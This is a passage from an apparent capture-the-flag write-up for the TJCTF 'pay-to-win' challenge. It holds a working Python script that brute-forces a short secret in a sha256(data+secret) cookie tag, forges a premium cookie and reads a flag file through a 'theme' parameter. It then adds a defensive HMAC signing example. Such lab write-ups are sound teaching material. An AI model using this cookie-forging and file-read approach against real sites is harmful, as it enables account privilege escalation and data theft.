We need to bypass this, so we brute-force the 6-character key.
Getting premium allows us to load anything, such as the flag.
```py
import hashlib
import itertools

import requests

# Key space: 6 characters drawn from lowercase letters and digits
characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
length = 6
combinations = itertools.product(characters, repeat=length)

url = 'https://pay-to-win.tjc.tf/'
# '{"username": "jerome", "user_type": "premium"}'
new = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogInByZW1pdW0ifQ=="
# '{"username": "jerome", "user_type": "basic"}'
old = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogImJhc2ljIn0="
# Known hash of the basic cookie (old + secret)
h = "46378b50e362bb73a60886b2d55957b6a79acd1ae8d6069a7bce2fbbda3f640c"


def sha256_hex(data):
    return hashlib.sha256(bytes(data, 'utf-8')).hexdigest()


actual_secret = ""
actual_hash = ""
for c in combinations:
    secret = ''.join(c)
    # The hash is sha256(data + secret), so test each candidate against the known pair
    if sha256_hex(old + secret) == h:
        actual_secret = secret
        # Re-sign the premium cookie with the recovered secret
        actual_hash = sha256_hex(new + secret)
        break

print(actual_secret)
print(actual_hash)

# Send the premium cookie with its hash and request the flag file via the theme parameter
r = requests.get(url + "?theme=/secret-flag-dir/flag.txt", cookies={'data': new, 'hash': actual_hash})
print(r.text)
```
Flag: `tjctf{not_random_enough_64831eff}`
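
The script works because the cookie tag is `sha256(data + secret)` with a secret drawn from only 36^6 values. The following is an added example, not code from the challenge or the original write-up, showing the weak scheme beside an HMAC-based one; `SERVER_KEY`, `encode_cookie`, `weak_tag`, `strong_tag`, `verify` and `user_type` are hypothetical names, and the server-side key handling is an assumption.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Size of the secret space the write-up searches: 36 symbols, 6 positions.
WEAK_KEYSPACE = 36 ** 6  # small enough to enumerate offline

# Assumption: a key generated once on the server and never sent to clients.
SERVER_KEY = secrets.token_bytes(32)  # 256 bits from the OS CSPRNG


def encode_cookie(payload: dict) -> str:
    """Base64-encode the JSON payload, matching the cookie format in the write-up."""
    return base64.b64encode(json.dumps(payload).encode()).decode()


def weak_tag(data: str, secret: str) -> str:
    """Scheme the write-up targets: sha256(data + short_secret)."""
    return hashlib.sha256((data + secret).encode()).hexdigest()


def strong_tag(data: str, key: bytes = SERVER_KEY) -> str:
    """HMAC-SHA256 over the cookie data with a long random key."""
    return hmac.new(key, data.encode(), hashlib.sha256).hexdigest()


def verify(data: str, tag: str, key: bytes = SERVER_KEY) -> bool:
    """Constant-time comparison of the expected and presented tags."""
    return hmac.compare_digest(strong_tag(data, key), tag)


def user_type(data: str, tag: str) -> str:
    """Trust cookie fields only when the tag verifies; otherwise treat as basic."""
    if not verify(data, tag):
        return "basic"
    return json.loads(base64.b64decode(data))["user_type"]


if __name__ == "__main__":
    basic = encode_cookie({"username": "jerome", "user_type": "basic"})
    premium = encode_cookie({"username": "jerome", "user_type": "premium"})
    tag = strong_tag(basic)
    print(WEAK_KEYSPACE, user_type(basic, tag), user_type(premium, tag))
```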